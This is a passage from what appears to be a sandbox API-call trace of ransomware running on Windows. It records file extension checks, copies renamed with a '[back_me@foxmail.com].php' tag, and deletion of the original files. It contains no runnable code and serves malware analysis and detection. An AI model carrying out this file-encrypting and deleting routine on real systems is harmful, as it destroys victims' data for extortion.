lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0053.036] SetEndOfFile (hFile=0x1a8) returned 1 [0053.036] CloseHandle (hObject=0x1a8) returned 1 [0053.036] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.036] SetEndOfFile (hFile=0x1b4) returned 1 [0053.037] CloseHandle (hObject=0x1b4) returned 1 [0053.037] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.037] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl")) returned 1 [0053.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.038] lstrlenW (lpString=".doc") returned 4 [0053.038] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0053.038] lstrlenW (lpString=".docx") returned 5 [0053.038] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0053.038] lstrlenW (lpString=".pdf") returned 4 [0053.038] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0053.038] lstrlenW (lpString=".xls") returned 4 [0053.038] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0053.038] lstrlenW (lpString=".xlsx") returned 5 [0053.038] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0053.038] lstrlenW (lpString=".ppt") returned 4 [0053.038] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0053.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.038] lstrlenW (lpString=".zip") returned 4 [0053.038] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0053.038] lstrlenW (lpString=".rar") returned 4 [0053.038] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0053.038] lstrlenW (lpString=".bz2") returned 4 [0053.038] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0053.038] lstrlenW (lpString=".7z") returned 3 [0053.038] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0053.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.038] lstrlenW (lpString=".dbf") returned 4 [0053.039] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0053.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.039] lstrlenW (lpString=".1cd") returned 4 [0053.039] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0053.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.039] lstrlenW (lpString=".jpg") returned 4 [0053.039] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0053.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.039] lstrlenW (lpString=".doc") returned 4 [0053.039] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0053.039] lstrlenW (lpString=".docx") returned 5 [0053.039] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0053.039] lstrlenW (lpString=".pdf") returned 4 [0053.039] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0053.039] lstrlenW (lpString=".xls") returned 4 [0053.039] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0053.039] lstrlenW (lpString=".xlsx") returned 5 [0053.039] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0053.039] lstrlenW (lpString=".ppt") returned 4 [0053.039] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0053.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.039] lstrlenW (lpString=".zip") returned 4 [0053.039] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0053.039] lstrlenW (lpString=".rar") returned 4 [0053.039] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0053.039] lstrlenW (lpString=".bz2") returned 4 [0053.040] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0053.040] lstrlenW (lpString=".7z") returned 3 [0053.040] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0053.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.040] lstrlenW (lpString=".dbf") returned 4 [0053.040] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0053.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.040] lstrlenW (lpString=".1cd") returned 4 [0053.040] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0053.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76 [0053.040] lstrlenW (lpString=".jpg") returned 4 [0053.040] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0053.040] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0053.040] lstrlenW (lpString="AG00052_.GIF") returned 12 [0053.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.040] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=7686) returned 1 [0053.040] CloseHandle (hObject=0x1b4) returned 1 [0053.040] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif")) returned 0x20 [0053.040] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.041] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.041] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0053.041] GetLastError () returned 0x0 [0053.041] ReadFile (in: hFile=0x1b4, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x1e06, lpOverlapped=0x0) returned 1 [0053.044] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x1e10, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x1e10, lpOverlapped=0x0) returned 1 [0053.045] ReadFile (in: hFile=0x1b4, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.045] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.045] SetEndOfFile (hFile=0x1a8) returned 1 [0053.045] CloseHandle (hObject=0x1a8) returned 1 [0053.045] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.045] SetEndOfFile (hFile=0x1b4) returned 1 [0053.046] CloseHandle (hObject=0x1b4) returned 1 [0053.046] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.046] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif")) returned 1 [0053.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.047] lstrlenW (lpString=".doc") returned 4 [0053.047] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.047] lstrlenW (lpString=".docx") returned 5 [0053.047] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.047] lstrlenW (lpString=".pdf") returned 4 [0053.047] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.047] lstrlenW (lpString=".xls") returned 4 [0053.047] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.047] lstrlenW (lpString=".xlsx") returned 5 [0053.047] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.047] lstrlenW (lpString=".ppt") returned 4 [0053.047] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.047] lstrlenW (lpString=".zip") returned 4 [0053.047] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.047] lstrlenW (lpString=".rar") returned 4 [0053.047] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.047] lstrlenW (lpString=".bz2") returned 4 [0053.047] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.047] lstrlenW (lpString=".7z") returned 3 [0053.047] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.047] lstrlenW (lpString=".dbf") returned 4 [0053.047] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.047] lstrlenW (lpString=".1cd") returned 4 [0053.047] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.048] lstrlenW (lpString=".jpg") returned 4 [0053.048] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.048] lstrlenW (lpString=".doc") returned 4 [0053.048] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.048] lstrlenW (lpString=".docx") returned 5 [0053.048] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.048] lstrlenW (lpString=".pdf") returned 4 [0053.048] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.048] lstrlenW (lpString=".xls") returned 4 [0053.048] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.048] lstrlenW (lpString=".xlsx") returned 5 [0053.048] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.048] lstrlenW (lpString=".ppt") returned 4 [0053.048] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.048] lstrlenW (lpString=".zip") returned 4 [0053.048] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.048] lstrlenW (lpString=".rar") returned 4 [0053.048] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.048] lstrlenW (lpString=".bz2") returned 4 [0053.048] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.048] lstrlenW (lpString=".7z") returned 3 [0053.048] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.048] lstrlenW (lpString=".dbf") returned 4 [0053.048] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.048] lstrlenW (lpString=".1cd") returned 4 [0053.049] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.049] lstrlenW (lpString=".jpg") returned 4 [0053.049] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.049] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0053.049] lstrlenW (lpString="AG00057_.GIF") returned 12 [0053.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.049] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=11891) returned 1 [0053.049] CloseHandle (hObject=0x1b4) returned 1 [0053.049] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif")) returned 0x20 [0053.049] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.049] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.049] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0053.050] GetLastError () returned 0x0 [0053.050] ReadFile (in: hFile=0x1b4, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x2e73, lpOverlapped=0x0) returned 1 [0053.051] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x2e80, lpOverlapped=0x0) returned 1 [0053.052] ReadFile (in: hFile=0x1b4, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.052] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.052] SetEndOfFile (hFile=0x1a8) returned 1 [0053.053] CloseHandle (hObject=0x1a8) returned 1 [0053.053] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.053] SetEndOfFile (hFile=0x1b4) returned 1 [0053.054] CloseHandle (hObject=0x1b4) returned 1 [0053.054] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.054] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif")) returned 1 [0053.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.054] lstrlenW (lpString=".doc") returned 4 [0053.054] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.054] lstrlenW (lpString=".docx") returned 5 [0053.054] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.054] lstrlenW (lpString=".pdf") returned 4 [0053.054] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.054] lstrlenW (lpString=".xls") returned 4 [0053.054] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.054] lstrlenW (lpString=".xlsx") returned 5 [0053.054] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.054] lstrlenW (lpString=".ppt") returned 4 [0053.055] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.055] lstrlenW (lpString=".zip") returned 4 [0053.055] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.055] lstrlenW (lpString=".rar") returned 4 [0053.055] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.055] lstrlenW (lpString=".bz2") returned 4 [0053.055] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.055] lstrlenW (lpString=".7z") returned 3 [0053.055] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.055] lstrlenW (lpString=".dbf") returned 4 [0053.055] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.055] lstrlenW (lpString=".1cd") returned 4 [0053.055] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.055] lstrlenW (lpString=".jpg") returned 4 [0053.055] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.055] lstrlenW (lpString=".doc") returned 4 [0053.055] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.055] lstrlenW (lpString=".docx") returned 5 [0053.055] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.055] lstrlenW (lpString=".pdf") returned 4 [0053.055] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.055] lstrlenW (lpString=".xls") returned 4 [0053.056] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.056] lstrlenW (lpString=".xlsx") returned 5 [0053.056] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.056] lstrlenW (lpString=".ppt") returned 4 [0053.056] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.056] lstrlenW (lpString=".zip") returned 4 [0053.056] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.056] lstrlenW (lpString=".rar") returned 4 [0053.056] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.056] lstrlenW (lpString=".bz2") returned 4 [0053.056] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.056] lstrlenW (lpString=".7z") returned 3 [0053.056] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.056] lstrlenW (lpString=".dbf") returned 4 [0053.056] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.056] lstrlenW (lpString=".1cd") returned 4 [0053.056] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.056] lstrlenW (lpString=".jpg") returned 4 [0053.056] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.056] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0053.056] lstrlenW (lpString="AG00090_.GIF") returned 12 [0053.056] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.057] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=517) returned 1 [0053.057] CloseHandle (hObject=0x1b4) returned 1 [0053.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif")) returned 0x20 [0053.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.057] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.057] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0053.058] GetLastError () returned 0x0 [0053.058] ReadFile (in: hFile=0x1b4, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x205, lpOverlapped=0x0) returned 1 [0053.059] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x210, lpOverlapped=0x0) returned 1 [0053.060] ReadFile (in: hFile=0x1b4, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.060] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.060] SetEndOfFile (hFile=0x1a8) returned 1 [0053.060] CloseHandle (hObject=0x1a8) returned 1 [0053.060] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.061] SetEndOfFile (hFile=0x1b4) returned 1 [0053.061] CloseHandle (hObject=0x1b4) returned 1 [0053.061] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 